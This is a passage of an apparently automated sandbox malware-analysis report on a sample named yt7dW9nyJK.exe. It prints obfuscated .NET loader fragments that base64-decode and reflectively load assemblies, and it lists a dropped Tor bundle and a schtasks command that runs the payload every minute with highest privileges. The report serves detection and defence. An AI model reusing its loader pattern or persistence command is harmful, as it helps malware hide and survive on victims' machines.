                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: yt7dW9nyJK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: yt7dW9nyJK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
                Source: 0.2.yt7dW9nyJK.exe.4c90000.4.raw.unpack, Qq.cs.Net Code: Md System.Reflection.Assembly.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_033A6338 push eax; ret 6_2_033A6341
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_033A3AB8 push ebx; retf 6_2_033A3ADA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_02EF634C push eax; ret 8_2_02EF6351
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_02EF15CD push ebx; ret 8_2_02EF15DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 8_2_087B7808 push eax; retf 8_2_087B7809
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe, Code function: 11_2_04CA30EB push es; retf 11_2_04CA30F2
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe, Code function: 11_2_04CA30E7 push es; retf 11_2_04CA30EA
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe, Code function: 11_2_04CA3031 push es; retf 11_2_04CA3032
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe, Code function: 11_2_04CA9290 push esp; retf 11_2_04CA9291
                Source: yt7dW9nyJK.exe, Static PE information: section name: .text entropy: 7.980169660583914
                Source: ffmaba.exe.4.dr, Static PE information: section name: .text entropy: 7.9803968726190435
                Source: ffmaba.exe.11.dr, Static PE information: section name: .text entropy: 7.9803968726190435
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe, File created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe, File created: C:\Users\user\AppData\Local\Temp\ffmaba.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, File created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll

                Boot Survival

                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: onion-port
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
